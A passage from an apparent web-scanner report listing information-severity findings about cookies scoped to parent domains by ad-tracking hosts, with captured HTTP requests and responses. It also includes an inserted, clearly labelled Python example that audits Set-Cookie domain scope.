Set-Cookie: geo=US; path=/; domain=.apple.com

...[SNIP]...

12.31. http://m.adnxs.com/msftcookiehandler

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dE361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; sess=1; uuid2=3420415245200633085; anj=Kfw)(BAfzI)_c:>YTQ8o9HI:j3Rd8gS=zfXihHsxM81LUQF9wtljE8<[9QgfpqS2HD7RgjO6UmrXplCnP$OBPv9`B`EcP`20sqmn`0A*=p-s1a3^i6HJ$o:ZH*W'mLq=2/=:*Ktve0`y<wiFQIHXHs4Sql-BZ-3'pfeBGUI'6#^/xw?0$!1jg6ERz:32x2S:@Q=-Lk2l`'R#V*']Bct8dIPsrw)DsL6mA9)'NgwW@MOpG/d'G?mm0ZPFj*qGoqQC^#TDIPC<oef.T<+.TWA3mz*6mre/9I/+dcKFbH@hjL*Wx%0.7K@L2I]or2_X$y2+i)!nFb`XWc:Gm!l#EljWaPrrpeaj<Wgq31OWpF+Y:rK>6NF>RW9bA+Hb3C>jZ-p=st1-]]8oRJ6EQ)DSt-Di4V]b6(qzCeK@GY*@qaj86c$W6gk>YRb1P:mG#jFsCtJeXzuFvt2jG-W+%e2k$-DDS)f/clIvy87JLzjO$w7BTd7<h%s4a>Cv%(1vzu#S9OUti[mX0*9Q[ss/Tv7vM0#/-8-vI(2B[=oU6k)RIvSo[*^Pv5H0:^blrQO!b*vb52-vNvuOh`IjH+%hA]..t4+'KGhT@?2!%>z(x84ihPGqQ*qx$lbALU!.1+T5EmuVL@YM2HK.$bb2oxUP71*A)^VE@C!P%mTf_GMkYDUta=IL

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:54 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:18:54 GMT

GIF89a.............!.......,........@..L..;

12.32. http://media.fastclick.net/w/get.media

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/get.media

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/get.media?sid=56553&m=6&tp=8&d=j&t=n HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lyc=BwAAAAR47gNOACAAAXBfIASgAAdBUwAAwPX1TUAOAbRHQAWAAABKIAYBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcBoUXgAQsBvUTgAQsDeVcAAA==; pjw=BAEAAAACIAMDlZAETiAGAQABIAMCkbAEYAcCRcEIIA1AEwEAAA==; adv_ic=BxEAAACVkAROIAYGAAFJAACGYSAHIAtAAAM/zNdNQAdAFwH0WSAHQAwgAAAC4AIXAM3gAhcBw8vgAS8BaVrgAS8AseACFwHIYOABFwCg4AIXAbRWIFcgW0AAADjgAhcB61zgARcAMeACFwH7X+ABRwAk4AIXANjgAl8AA+ACFwA24AIvAdzK4AGnANPgAr8A2eACFwA+4AK/ANPgAhcAjCEpwKcA0OACFwFHU+ABjwDM4AIXAaJS4AEXAMngAhcA4+ACjwFsseABjwTNTwAACkEEAgAAAA==; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:01 GMT
Content-Type: application/x-javascript
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 297
Set-Cookie: pjw=BAIAAAACIAMDj5EETiAGAQABIAMCkbAEYBMCRcEIIA2AEwCV4AIfAYStgB8BcbqAHwMGAAAA; domain=.fastclick.net; path=/; expires=Sun, 26-Jun-2011 13:31:01 GMT
Set-Cookie: adv_ic=BxIAAACVkQROIAYJAAFJAABAYQAAAiALQAAAj+ACFwCG4AIXAz/M101AH0AvAfRZIAdADCAAAALgAhcAzeACFwHDy+ABLwFpWuABLwCx4AIXAchg4AEXAKDgAhcBtFYgVyBbQAAAOOACFwHrXOABFwAx4AIXAftf4AFHACTgAhcA2OACXwAD4AIXADbgAi8B3MrgAacA0+ACvwDZ4AIXAD7gAr8A0+ACFwCMIUHApwDQ4AIXAUdT4AGPAMzgAhcBolLgARcAyeACFwDj4AKPAWyx4AGPBM1PAAAKQQQCAAAA; domain=.fastclick.net; path=/; expires=Sat, 23-Jun-2012 13:31:01 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:31:01 GMT

{var dz=document;
dz.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid
...[SNIP]...

12.33. http://media.fastclick.net/w/tre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=17597;evt=17799;cat1=22392;cat2=22393;rand=[CACHEBUSTER] HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=315899333
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adv_ic=BwYAAAC3stdNIAYGAAFJAADrXCAHIAtAAAGiseABFwGMTuABFwCR4AIXAeNf4AEXAGzgAhcEzU8AAApARCAAAF/gAhcBtFbgAS8AKeACFwF4XcAXAQAA; lyc=BwAAAATA9fVNACAAAbRHIASgAABKIAcBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcHoUUAAKrsA05AEQFwX0AFgAABQVOAB0AA4AUXAQAA; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:39 GMT
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=CAAAAAR47gNOACAAAXBfIASgAAdBUwAAwPX1TUAOAbRHQAWAAABKIAYBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcGoUUAAI2QBGCPAb1E4AEXAXlX4AEL4AUXAQAA; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:30:39 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:30:39 GMT

GIF89a.............!.......,...........D..;

12.34. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3 HTTP/1.1
Host: network.realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
Cookie: OAX=rcHW804Ekc4ABIzz; NXCLICK2=011Qa6UK; NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Fri, 24 Jun 2011 13:32:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: NXCLICK2=011Qa6Uv; expires=Mon, 24-Jun-13 13:32:37 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
Content-Length: 345
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 13:33:37 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...

12.35. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=647111455;fpan=0;fpa=P0-1728005155-1308921999956;ns=0;url=http%3A%2F%2Fwww.redorbit.com%2Fnews%2Fbusiness%2F1993118%2Fspil_games_selects_adyens_internet_payment_system_for_global_social%2F;ref=;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1308922015580;tzo=300;a=p-c0n-0mxg7_y5A HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EEIBswEBiAeB0g4eqT0eThwirRfeKVpIfjDbQKs_YIYACUCkAOZ80iYTCOFdHhDRDhDRy0lDAOEQkdEOVPMNG7MKXhQDBQSEXzPRThAP0w6fKkENpPXaOHENkpGdKRA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://bh.contextweb.com/bh/set.aspx?action=add&advid=357&token=EHEX1
Set-Cookie: d=EOYBrwEBiAeB0g4eqT0eThwijElqSH4w20CrP2CGAAlApADmfNImEwjhXR4Q0Q4Q0ctJQwDhEJHRDlTzDRuzCl4UAwUEhF8z0U4QD9MOnypBDaT12jhxDZKRnSkQ; expires=Thu, 22-Sep-2011 13:26:54 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Fri, 24 Jun 2011 13:26:54 GMT
Server: QS


12.36. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6286&nid=2132&put=E3F32BD05A8DDF4D5646D79640088B&expires=365 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; put_1185=4325897289836481830; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; csi15=3140642.js^2^1308614600^1308614602; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; rpb=7259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%263672%3D1%264894%3D1; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%263672%3D12881%2C0%2C1%2C7%2C%264894%3D12881%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%263672%3D1%264894%3D1%266286%3D1; expires=Sun, 24-Jul-2011 17:04:28 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%263672%3D12881%2C0%2C1%2C7%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C0%2C2%2C%2C; expires=Sun, 24-Jul-2011 17:04:28 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2132=E3F32BD05A8DDF4D5646D79640088B; expires=Sat, 23-Jun-2012 17:04:28 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.37. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=2be5fb6c-c0d8-147f-d80c-480b0a7b0393&rtb=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1308190406; i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:27 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Sun, 23-Jun-2013 17:04:27 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.38. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
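The check behind findings 12.37 and 12.38 (a Set-Cookie whose Domain attribute names a parent of the responding host, so every sibling host under that parent can read or overwrite the cookie), as an added Python example; it is not part of this report or of the scanner that produced it. It parses the Set-Cookie header captured from r.openx.net above, and constructed headers for a hypothetical pixel.example.com host cover the other outcomes (exact, host-only, rejected, session-like). The session-name heuristic is an assumption, not a standard.

```python
"""Audit Set-Cookie headers for cookies scoped to a parent of the issuing host.

A Domain attribute such as 'domain=.openx.net' on a response from r.openx.net
makes the cookie visible to every host under openx.net. RFC 6265 section 5.3
also says a browser must ignore a Domain attribute that does not domain-match
the request host, so those cases are reported separately as "rejected".
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Heuristic (an assumption, not a standard): cookie names that often carry
# session tokens. The report's wording "does not appear to contain a session
# token" is exactly this kind of name-based guess and deserves manual review.
SESSION_NAME_HINTS = ("sess", "sid", "token", "auth", "login")


@dataclass
class CookieFinding:
    name: str
    domain: Optional[str]  # Domain attribute as sent; None means host-only cookie
    scope: str             # "host-only", "exact", "parent" or "rejected"
    session_like: bool


def parse_set_cookie(header_value: str) -> Tuple[str, str, Dict[str, str]]:
    """Split 'name=value; attr=val; flag' into (name, value, {attr_lower: val}).

    Splitting on ';' is safe: the Expires date contains a comma but never a
    semicolon. Valueless attributes such as HttpOnly map to an empty string.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def classify_domain(host: str, domain_attr: Optional[str]) -> str:
    """Say how a Domain attribute scopes the cookie relative to the request host.

    Not modelled: browsers additionally reject public suffixes such as '.com'
    by consulting the Public Suffix List.
    """
    host = host.lower().rstrip(".")
    if not domain_attr:
        return "host-only"                # no Domain: only the exact host gets it
    dom = domain_attr.lower().strip(".")  # a leading dot is ignored per RFC 6265
    if dom == host:
        return "exact"                    # same reach as a host-only cookie
    if host.endswith("." + dom):
        return "parent"                   # shared with every sibling host under dom
    return "rejected"                     # does not domain-match; browser ignores it


def audit_response(host: str, set_cookie_headers: List[str]) -> List[CookieFinding]:
    """Classify every Set-Cookie header of one response."""
    findings = []
    for header in set_cookie_headers:
        name, _value, attrs = parse_set_cookie(header)
        domain = attrs.get("domain")
        session_like = any(hint in name.lower() for hint in SESSION_NAME_HINTS)
        findings.append(CookieFinding(name, domain, classify_domain(host, domain), session_like))
    return findings


def parent_scoped(host: str, set_cookie_headers: List[str]) -> List[CookieFinding]:
    """Only the cookies a scanner would report under this issue."""
    return [f for f in audit_response(host, set_cookie_headers) if f.scope == "parent"]


# Taken from the r.openx.net response captured in the report above.
OPENX_HOST = "r.openx.net"
OPENX_SET_COOKIE = [
    "i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Sun, 23-Jun-2013 17:04:27 GMT; path=/; domain=.openx.net",
]

# Constructed sample on a hypothetical host (not from the report): one cookie
# widened to the parent, one kept exact, one host-only, one with a Domain the
# browser would reject, and one whose name suggests a session token.
SAMPLE_HOST = "pixel.example.com"
SAMPLE_SET_COOKIE = [
    "rpb=7259%3D1; expires=Sun, 24-Jul-2011 17:04:28 GMT; path=/; domain=.example.com",
    "rpx=5671%3D11993; path=/; domain=.pixel.example.com",
    "cd=false; path=/",
    "evil=1; path=/; domain=.other.example",
    "PHPSESSID=abc123; path=/; domain=.example.com; HttpOnly",
]

if __name__ == "__main__":
    for host, headers in ((OPENX_HOST, OPENX_SET_COOKIE), (SAMPLE_HOST, SAMPLE_SET_COOKIE)):
        print(f"== {host}")
        for f in audit_response(host, headers):
            flag = " (session-like: raise severity)" if f.scope == "parent" and f.session_like else ""
            print(f"  {f.name:<10} domain={str(f.domain):<22} {f.scope}{flag}")
```

A parent-scoped cookie is only "Information" severity when, as here, it carries a tracking identifier; the same Domain attribute on a session cookie lets any compromised or attacker-controlled sibling host under the parent read the session or plant one (session fixation), which is why the name heuristic is there to prompt a closer look rather than to decide the outcome.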

Request

GET /r/beacon?b2=D_F1HyIlEt90XWOwBLOFNrAiPk8Ac4qydps8iNraMEKDvodA_sbW8c2JnlV_mybf1n-tmlhhoYFMuRzx0bELYA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://everquest2.com/free_to_play
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=o4ZhYxPJ2Pw5XfvbQhsaFpDfbEnc9w-vODw3bflONElh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCaeoKEGWRrYa1j0O8IgD5vMnwFS7HtMXofNHrftsH-bKaR7vykJ4G_blnocTkHaMlPW77G4xQCEJUEws-BatYXJ6IYC8WBTQX8bUUIXmPY-LZw3JJMkqx51w1pR2YtuCpq6FZW9ee6pqepxcDrSlSmqIMYGmHJG75FIrenYIGOYR5O0czW-xR8eItR9Et5IZyk-3dtU8NWxmwQveYnMRjYK7u1KunjyAhI4wjE-uujeSVGDu5X63VUZQiL9158oTLi4YKJ8H0IRHnj6n6s75qKvM_F4QDFXNXDASdDuX36Wkzp15bX7OJQXizqFWPuRMtGo3I48fCleB9QRLmssYnqhwVp1d1lcuv8Oi-bAzofc8JKSrpSfruct-wsYLh-MTRC22HhlIXg-C3QmlQPe2jan2qzWIFcW73-ffTz4aBpEcHMJy0LW8k-xOEVdrjWU9Du1zMeHAy7ZZoSm8iv5WlzLijE8Sr5GgLBM0V_efj8wkT0pwQwhdI7QCRTHyjVkbrJq_P48i1E6YSPriW57bBIAv4IzT6zG86PBT5DByM8URH6aMpx3xlY8nTvgssFknIvh_X9bzHYS-B9LdlbAgcLLdD37vgtqknSg2EWl8FZYzTR7vykJ4G_blnocTkHaMlPYcsVEyjwEavPZ1IOQB-k76IYC8WBTQX8bUUIXmPY-LZOAc3GkX-Xd6ueK8RLrApqcNXPoKSnz19gf43sN51hM0MYGmHJG75FIrenYIGOYR5sK2sI9UrBz0jKXQxWnwAHe3dtU8NWxmwQveYnMRjYK5roYtEm1m2ljA5TnK4b-ETzYtUd86s7MhdQdfuW2QJ-O9qBflBAlKfYsj0c9fffeCHkZfYN0i6ORTQwcAoE_bXp15bX7OJQXizqFWPuRMtGst8JIuCgxLilohaEpCojUhvsDM2i9ZkSeodg2n84FubH8xw0gLkNMgYofMuPt-PkO8T0cGKn4uRx4CMmEsBWiKqzWIFcW73-ffTz4aBpEcHFs6L3zNdz5ZjoOzvPQTfb835UBdTu1PnDKNhFUbfz_4bftaK-dcMAPf-7IWagRhOwZr_Z_WRhdQvL8CTs4JYMK_P48i1E6YSPriW57bBIAukpN8NUt-_Qle288Cz3gyRLJfQW9W423bNMd7giheysbXds6tq7dVAQSvAX_f_7sdXQLEl7c5RtdI6fIas1hLmR7vykJ4G_blnocTkHaMlPf6EzPEWOsOXwfj5fQxhr_GIYC8WBTQX8bUUIXmPY-LZhNX08PCC1AA7AyxwLL3zQuBx6dhirOES5Nb1eoO8ppIMYGmHJG75FIrenYIGOYR5vPsApCsV7LwfVDjW_3mDwgxgaYckbvkUit6dggY5hHmRvPUTVUGpkj-QsuiT06jI7d21Tw1bGbBC95icxGNgrvI8sTlfLiUVirVDHB_PLB3B7dLv8mQai9FqZxhT-hpTl-Vx6Wg5mtI-fW_MsrYoi_G937R2K7HfGbS1pD2qdcOnXltfs4lBeLOoVY-5Ey0aGA-3n6D_561g-DmvDpQzUlnrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6EREEPS8RoGZCwLoPdHLH_1_KrNYgVxbvf599PPhoGkRwfnOHjpvtkzSEl4d-wdumAAceRGHz-2NrTvKdg0ajpYMtRTvb1kIdd3t20BSfIvd2lR7INwxHtn1BHnDvA-Z2YBr8_jyLUTphI-uJbntsEgC40HfGMMs5mhycnLkZacVec5BRFaFQeeKtoiQ2ejjL3t_kvLTuGDqhWfDkMq3m37HLQ6_3tKFpdfm7OKds5BK7lHu_KQngb9uWehxOQdoyU9DVTnKf4h_4wFcB-MHxcwQ4hgLxYFNBfxtRQheY9j4tnUR_l5Brxo2KRun1gRg
